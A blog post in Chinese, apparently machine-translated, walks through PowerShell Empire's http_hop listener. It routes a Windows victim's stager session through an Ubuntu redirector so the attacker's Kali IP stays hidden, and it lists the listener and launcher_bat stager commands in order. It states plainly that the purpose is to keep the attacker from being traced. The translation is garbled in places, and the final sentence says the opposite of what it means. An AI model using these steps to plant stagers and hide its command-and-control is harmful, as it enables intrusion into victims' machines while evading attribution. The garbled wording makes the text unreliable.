• 使用PowerShell Empire(http_hop)隐藏IP


    在本文中,我们学习了在PowerShell帝国中使用跃点有效负载。Empire拥有一个名为http_hop的内置侦听器,它使我们可以在获取代理后将流量重定向到另一个活动的侦听器之一。因此,名称将其从一个侦听器跳到另一个侦听器时进行跳转,以重定向流量。

    与Metasploit相似,帝国中的跃点侦听器使用hop.php文件。当您激活跳侦听器时,它将生成三个PHP文件,这些文件将重定向您现有的侦听器。将所述文件放在您的跳转服务器(ubuntu)中,然后根据调解器(即我们的跃点监听器)获取会话,从而设置您的stager。

    在下图中,您可以看到我们Kali的IP。现在,我们将尝试使用http_hop有效负载通过ubuntu进行Windows会话,以便隐藏我们自己的IP,即,基本上,我们的http_hop有效负载将帮助我们(攻击者)从被捕获的位置隐藏。

    在下图中,您也可以看到我们的ubuntu的IP

    现在,让我们开始吧。首先,对于该类型,我们应该有一个简单的http侦听器:

    uselistener http

    execute

    现在,输入以下命令启动http_hop侦听器:

    uselistener http_hop

    set RedirectListener http

    set Host //192.168.1.111

    在这里,我们给了RedirectListener,即来自http监听器的所有流量都将被定向到 http_hop 监听器。

    执行上面的侦听器将创建三个文件,如上图所示。将这些文件传输到 Ubuntu的/ var / www / html位置,如下图所示:

    现在,您可以在下图中看到我们激活了两个侦听器:

    让我们通过键入以下命令来启动stager

    usestager windows/launcher_bat

    set Listener http_hop

    execute

    在目标PC中执行了bat文件后,我们将进行会话。现在,如果您观察到我们通过其获取会话的IP是 Ubuntu的,而不是Windows的,但是我们可以访问 Windows PC,同样,在Windows中,它将显示攻击的计算机是Ubuntu,而不是kali。因此,我们的http_hop是有效的。

    总之, http_hop 侦听器的主要优点是,由于该侦听器隐藏了原始IP,因此可以帮助将攻击者识别为在目标PC上。

  • 相关阅读:
    挑战练习13.8 用于RecyclerView 的空视图
    挑战练习13.7 复数字符串资源
    挑战练习13.6 删除crime 记录
    挑战练习12.3 更多对话框
    20. Valid Parentheses
    挑战练习11.6 添加Jump to First按钮和Jump to Last按钮
    内存 分析
    HOOK64 32转换
    MD5
    HOOk快捷键
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13725093.html
Copyright © 2020-2023  润新知